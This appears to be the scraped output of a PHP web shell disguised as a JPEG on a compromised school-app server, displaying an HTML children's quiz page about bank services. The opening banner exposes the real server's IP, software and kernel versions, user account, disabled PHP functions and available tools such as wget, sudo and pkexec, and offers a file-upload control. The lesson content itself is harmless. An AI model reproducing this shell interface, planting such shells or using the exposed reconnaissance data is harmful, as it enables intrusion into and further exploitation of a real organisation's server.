????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.133.59.209 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelH/Category1/ |
Upload File : |
<!doctype html> <html> <head> <title>Questions and answers</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> function page_preLoad() { s_setDeviceTypeLevelCategoryLastLesson(Level.H, Category.No1); s_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); s_setHeaderTable('id_tblHeader', s_title_page, s_getSubTitle(Level.H, Category.No1, '26b'), true, true); s_setFooterTable('id_tblFooter', true, true, true, true, true); var ids_headings = ['id_td_heading1', 'id_td_heading2']; var ids_tds = ['id_options1', 'id_td_money', 'id_td_atm', 'id_td_cheque', 'id_td_cash', 'id_td_passbook']; var ids_spans = ['id_span_money', 'id_span_atm', 'id_span_cheque', 'id_span_cash', 'id_span_passbook']; var ids_boxes = ['id_dropbox_passbook', 'id_dropbox_cheque', 'id_dropbox_money', 'id_dropbox_atm', 'id_dropbox_cash']; var ids_texts = new Array(); for (var textId = 1; textId <= 9; textId++) { ids_texts.push('id_td_text' + textId); } var ids_textBoxes = new Array(); for (var textBoxId = 1; textBoxId <= 2; textBoxId++) { var idTextBox = 'id_textBox' + textBoxId; var eTextBox = document.getElementById(idTextBox); eTextBox.value = ''; if (s_currentDeviceType == s_DeviceTypeAndroidDeviceApp) { eTextBox.style.border = 'solid 2px black'; } ids_textBoxes.push(idTextBox); } var ids_All = ids_headings.concat(ids_texts, ids_textBoxes, ids_tds, ids_boxes); s_adjust_fontSize_for_ids_all_devices(ids_All, 70); s_init_dropBox_tds_withOUT_drag_here(ids_boxes); s_init_dropping_spans(ids_spans); var id_tables_array = ['id_table1', 'id_table2']; s_border_collapse_for_tables_except_android(id_tables_array); } function page_onLoad() { } function btnHome_click() { s_btnHomeCategories_click('LevelH'); } function btnPrevious_click() { window.location = 'LevelHCat1Lesson26a.html'; } function btnNext_click() { window.location = 'LevelHCat1Lesson27.html'; } function DragDrop(id_dropBox, ids_array) { if (s_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { s_setTextAndBackgroundColorToGreenAndIsMovedTrue(s_currentDropingId, id_dropBox); s_set_currentDropingId_draggbleToFalse(); } else { s_resetCurrentDroppingPosition(id_dropBox); } } function btnValidate_click() { var ids_boxes = ['id_dropbox_passbook', 'id_dropbox_cheque', 'id_dropbox_money', 'id_dropbox_atm', 'id_dropbox_cash']; var isAllBoxesFilled = s_isAllInfosFilled(ids_boxes); var eTextBox1 = document.getElementById('id_textBox1'); var eTextBox2 = document.getElementById('id_textBox2'); if ((eTextBox1.value !== '') && (eTextBox2.value !== '') && isAllBoxesFilled) { s_show_claps_animation('s_id_div_message'); } } </script> </head> <body onload="page_onLoad()"> <div id="s_id_div_message"></div> <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0"> <tr height="45%"> <td style="padding-bottom:0px"> <table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr height="10%"> <td id="id_td_heading1" class="s_style_heading">Answer the following: </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr height="50%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr height="30%"> <td id="id_td_text1" class="s_style_textBlack_padding_left">1. Explain about safety deposit lockers.</td> </tr> <tr height="*"> <td id="id_td_text2" align="center"> <textarea id="id_textBox1" class="s_style_droppable_dash" style="width:88%; text-align:left; resize:none" rows="5"> </textarea> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr height="30%"> <td id="id_td_text3" class="s_style_textBlack_padding_left">2. What are the other services does bank provide?</td> </tr> <tr height="*"> <td id="id_td_text4" align="center"> <textarea id="id_textBox2" class="s_style_droppable_dash" style="width:88%; text-align:left; resize:none" rows="5"> </textarea> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table id="id_table2" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr height="10%"> <td id="id_td_heading2" class="s_style_heading"><u>Fill in the blanks</u>:</td> </tr> <tr height="15%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_options1" class="s_style_heading_options" width="*">Options:</td> <td id="id_td_money" class="s_style_droppable_dash" width="17%" align="center" draggable="true" ondragstart="s_dragStartNew(event)"> <span id="id_span_money">money</span> </td> <td id="id_td_atm" class="s_style_droppable_dash" width="17%" align="center" draggable="true" ondragstart="s_dragStartNew(event)"> <span id="id_span_atm">ATM</span> </td> <td id="id_td_cheque" class="s_style_droppable_dash" width="17%" align="center" draggable="true" ondragstart="s_dragStartNew(event)"> <span id="id_span_cheque">cheque</span> </td> <td id="id_td_cash" class="s_style_droppable_dash" width="17%" align="center" draggable="true" ondragstart="s_dragStartNew(event)"> <span id="id_span_cash">cash</span> </td> <td id="id_td_passbook" class="s_style_droppable_dash" width="17%" align="center" draggable="true" ondragstart="s_dragStartNew(event)"> <span id="id_span_passbook">Passbook</span> </td> </tr> </table> </td> </tr> <tr height="*"> <td style="padding-left:2%"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr id="id_tr_dropbox_passbook" ondragover="s_highlight('id_dropbox_passbook'); s_allowDrop_web(event)" ondragleave="s_un_highlight('id_dropbox_passbook')" ondrop="DragDrop('id_dropbox_passbook', ['id_span_passbook'])"> <td id="id_td_text5" class="s_style_textBlack_without_bold"> <span>1. </span> <span id="id_dropbox_passbook" class="s_style_droppable_dash">_________</span> <span> gives the details of deposits and withdrawals.</span> </td> </tr> <tr id="id_tr_dropbox_cheque" ondragover="s_highlight('id_dropbox_cheque'); s_allowDrop_web(event)" ondragleave="s_un_highlight('id_dropbox_cheque')" ondrop="DragDrop('id_dropbox_cheque', ['id_span_cheque'])"> <td id="id_td_text6" class="s_style_textBlack_without_bold"> <span>2. We can deposit </span> <span id="id_dropbox_cheque" class="s_style_droppable_dash">_________</span> <span> also in our account.</span> </td> </tr> <tr id="id_tr_dropbox_money" ondragover="s_highlight('id_dropbox_money'); s_allowDrop_web(event)" ondragleave="s_un_highlight('id_dropbox_money')" ondrop="DragDrop('id_dropbox_money', ['id_span_money'])"> <td id="id_td_text7" class="s_style_textBlack_without_bold"> <span>3. Banks adds some more </span> <span id="id_dropbox_money" class="s_style_droppable_dash">_________</span> <span> as an interest.</span> </td> </tr> <tr id="id_tr_dropbox_atm" ondragover="s_highlight('id_dropbox_atm'); s_allowDrop_web(event)" ondragleave="s_un_highlight('id_dropbox_atm')" ondrop="DragDrop('id_dropbox_atm', ['id_span_atm'])"> <td id="id_td_text8" class="s_style_textBlack_without_bold"> <span>4. We get </span> <span id="id_dropbox_atm" class="s_style_droppable_dash">_________</span> <span> card to withdraw money from our account.</span> </td> </tr> <tr id="id_tr_dropbox_cash" ondragover="s_highlight('id_dropbox_cash'); s_allowDrop_web(event)" ondragleave="s_un_highlight('id_dropbox_cash')" ondrop="DragDrop('id_dropbox_cash', ['id_span_cash'])"> <td id="id_td_text9" class="s_style_textBlack_without_bold"> <span>5. The deposited cheque turn into </span> <span id="id_dropbox_cash" class="s_style_droppable_dash">_________</span> <span> within three days.</span> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_span_money', {handle : 'id_td_money', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}}); new webkit_draggable('id_span_atm', {handle : 'id_td_atm', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}}); new webkit_draggable('id_span_cheque', {handle : 'id_td_cheque', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}}); new webkit_draggable('id_span_cash', {handle : 'id_td_cash', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}}); new webkit_draggable('id_span_passbook', {handle : 'id_td_passbook', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}}); webkit_drop.add('id_tr_dropbox_money', {onOver : function(){s_highlight('id_dropbox_money')}, onOut : function(){s_un_highlight('id_dropbox_money')}, onDrop : function(){DragDrop('id_dropbox_money', ['id_span_money'])}}); webkit_drop.add('id_tr_dropbox_atm', {onOver : function(){s_highlight('id_dropbox_atm')}, onOut : function(){s_un_highlight('id_dropbox_atm')}, onDrop : function(){DragDrop('id_dropbox_atm', ['id_span_atm'])}}); webkit_drop.add('id_tr_dropbox_cash', {onOver : function(){s_highlight('id_dropbox_cash')}, onOut : function(){s_un_highlight('id_dropbox_cash')}, onDrop : function(){DragDrop('id_dropbox_cash', ['id_span_cash'])}}); webkit_drop.add('id_tr_dropbox_cheque', {onOver : function(){s_highlight('id_dropbox_cheque')}, onOut : function(){s_un_highlight('id_dropbox_cheque')}, onDrop : function(){DragDrop('id_dropbox_cheque', ['id_span_cheque'])}}); webkit_drop.add('id_tr_dropbox_passbook', {onOver : function(){s_highlight('id_dropbox_passbook')}, onOut : function(){s_un_highlight('id_dropbox_passbook')}, onDrop : function(){DragDrop('id_dropbox_passbook', ['id_span_passbook'])}}); </script> </body> </html>